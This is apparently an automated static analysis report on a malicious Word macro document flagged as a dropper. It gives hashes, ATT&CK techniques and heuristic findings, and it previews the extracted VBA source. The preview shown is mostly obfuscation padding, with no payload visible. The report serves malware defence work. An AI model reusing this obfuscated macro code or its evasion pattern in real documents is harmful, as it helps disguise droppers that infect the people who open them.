Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a62dc67265d64c53…

MALICIOUS

Office (OLE)

Size: 204.5 KB
Created: 2018-07-16 16:16:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 968fac151551d8b66ebff7c57a221f1e
SHA-1: 3be3db5cb41739f03b05054a618b28ffaa7f2003
SHA-256: a62dc67265d64c53e14572d4942afc7bb4bdaab008732a22b6ee9afd4d1fe1f6
Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1140 Deobfuscate/Decode Files or Information

The file is a malicious Office document containing VBA macros, specifically an AutoOpen macro that calls CreateObject, so the macro is designed to execute code as soon as the document is opened. The ClamAV detection 'Doc.Dropper.Agent-6616261-0' strongly suggests the document's purpose is to drop and execute a secondary payload. The VBA code itself is obfuscated (large amounts of dead-code loops and conditional-compilation blocks), which hinders a precise analysis of its exact actions, but the overall pattern points to a downloader or dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6616261-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6616261-0
  • VBA macros detected [medium; 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project contains an AutoOpen macro (runs automatically when the document is opened).
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    The VBA code calls CreateObject (COM object instantiation).
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 54624 bytes
SHA-256: 9413bff51d5cb02494b214e02ebe23dd44ab1e6b5a1fbc6943f21d4fddd3dae3

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "FVXAnubdU4"
Public Function utpFMXhkf7e(ByRef zjacV7FNM As String, ByVal JPJ5DOAWg As String) As String
Dim CeHEcuzuq6() As Byte
#If 7 * 8 > 5 Then
Dim mYfx593UWwRhea As String
#Else
Dim mYfx593UWwRhea As Object
#End If
#If 9 * 8 > 8 Then
Dim T8kIZt5sMqDdrH As String
#Else
Dim T8kIZt5sMqDdrH As Object
#End If
Dim RAQusKA() As Byte
Dim bCz0f2Zggo As String
For DWY4UGli = 0 To 7
bCz0f2Zggo = bCz0f2Zggo + "q"
Next DWY4UGli
Dim iAEufZM As String
For qiH16c = 0 To 9
iAEufZM = iAEufZM + "D"
Next qiH16c
Dim CccO9FQd As Long
For vtKFw7 = 5 To 18
CccO9FQd = CccO9FQd + vtKFw7
Next vtKFw7
Dim zs1s5jE3 As Long
For TQbF1i3R = 5 To 13
zs1s5jE3 = zs1s5jE3 + TQbF1i3R
Next TQbF1i3R
Dim kegAN1Qe As String
For ppyKpmAr = 0 To 5
kegAN1Qe = kegAN1Qe + "w"
Next ppyKpmAr
Dim MnN9ptL As String
For nqMJhoY = 0 To 5
MnN9ptL = MnN9ptL + "L"
Next nqMJhoY
Dim r0q3YTR, cZxnY7 As Integer
r0q3YTR = 5 + 7
For DMib58PSm = 0 To 8
cZxnY7 = cZxnY7 + DMib58PSm
Next DMib58PSm
If cZxnY7 < DMib58PSm Then
Dim dkkNkSt As Long
End If
#If 8 * 9 > 6 Then
Dim dtr41wE5c0j5k4 As String
#Else
Dim dtr41wE5c0j5k4 As Object
#End If
Dim joQwFNZoLN5 As Long
Dim hZdYvA As Long
For fY9GSq = 7 To 10
hZdYvA = hZdYvA + fY9GSq
Next fY9GSq
Dim bEjG5k2GQe, su6zy3pDi0 As Integer
bEjG5k2GQe = 6 + 8
For qsB1MrR3j0 = 0 To 8
su6zy3pDi0 = su6zy3pDi0 + qsB1MrR3j0
Next qsB1MrR3j0
If su6zy3pDi0 < qsB1MrR3j0 Then
Dim mmIGNPdYo As Long
End If
For DjKgXK7To = 0 To 7
kajJLfaA = kajJLfaA + DjKgXK7To
Next DjKgXK7To
Dim T5XIGoRS As Long
For Gg22gen8Gy = 5 To 16
T5XIGoRS = T5XIGoRS + Gg22gen8Gy
Next Gg22gen8Gy
Dim iGbiyo8K, HYfPjKoT As Integer
iGbiyo8K = 6 + 9
For gKUJbRx = 0 To 9
HYfPjKoT = HYfPjKoT + gKUJbRx
Next gKUJbRx
If HYfPjKoT < gKUJbRx Then
Dim dRbgdvXM As Long
End If
Dim e3ks0ph As String
For BRp88LK = 0 To 6
e3ks0ph = e3ks0ph + "d"
Next BRp88LK
#If 8 * 7 > 9 Then
Dim pEcphpCsbFkXid As String
#Else
Dim pEcphpCsbFkXid As Object
#End If
Dim zRRqhnVAkK As Long
Dim saeeSMn5, VJKsvEn As Integer
saeeSMn5 = 5 + 7
For VHX5nZdP = 0 To 7
VJKsvEn = VJKsvEn + VHX5nZdP
Next VHX5nZdP
If VJKsvEn < VHX5nZdP Then
Dim TpqFkJ4 As Long
End If
Dim Bmnw7dEIm As Long
For jKYcxsH = 5 To 14
Bmnw7dEIm = Bmnw7dEIm + jKYcxsH
Next jKYcxsH
Dim qmQJG55NqQ As String
For SdL8OTXJ = 0 To 7
qmQJG55NqQ = qmQJG55NqQ + "D"
Next SdL8OTXJ
Dim YMA9ATBV As Long
For eeyOJNrtSN = 8 To 15
YMA9ATBV = YMA9ATBV + eeyOJNrtSN
Next eeyOJNrtSN
Dim KKvJzn As String
For Bw2Cc3c = 0 To 7
KKvJzn = KKvJzn + "X"
Next Bw2Cc3c
Dim Gcreamu As String
For cNvdsyL = 0 To 7
Gcreamu = Gcreamu + "t"
Next cNvdsyL
#If 8 * 8 > 9 Then
Dim tXy57mPGz05ZqQ As String
#Else
Dim tXy57mPGz05ZqQ As Object
#End If
#If 7 * 7 > 8 Then
Dim jIf5SvjmiZYqTE As String
#Else
Dim jIf5SvjmiZYqTE As Object
#End If
#If 8 * 7 > 7 Then
Dim pIuK9QhapQa7gb As String
#Else
Dim pIuK9QhapQa7gb As Object
#End If
Dim mEC0DGmgu7A As Long
Dim T41Dqr As String
For IAQH19euU = 0 To 6
T41Dqr = T41Dqr + "r"
Next IAQH19euU
Dim VQeJLX5 As String
For pAVIacwgeE = 0 To 9
VQeJLX5 = VQeJLX5 + "c"
Next pAVIacwgeE
Dim YK7w3pyxm As String
For lkUAax = 0 To 6
YK7w3pyxm = YK7w3pyxm + "A"
Next lkUAax
For vDjo1K = 0 To 8
SMnt0RCFZ = SMnt0RCFZ + vDjo1K
Next vDjo1K
Dim mn9mUg, krmgaw0Ibi As Integer
mn9mUg = 6 + 5
For ONSPkMM = 0 To 9
krmgaw0Ibi = krmgaw0Ibi + ONSPkMM
Next ONSPkMM
If krmgaw0Ibi < ONSPkMM Then
Dim HI6gCCWkc As Long
End If
#If 6 * 8 > 7 Then
Dim rI6VGKuM1MPh6e As String
#Else
Dim rI6VGKuM1MPh6e As Object
#End If
#If 9 * 8 > 6 Then
Dim VyIaAUibwabiJl As String
#Else
Dim VyIaAUibwabiJl As Object
#End If
Dim JNNFx9Fm As Long
Dim EnScmU9V7 As String
For s7vmxLbdLN = 0 To 5
EnScmU9V7 = EnScmU9V7 + "t"
Next s7vmxLbdLN
Dim OQft3e6hie
... (truncated)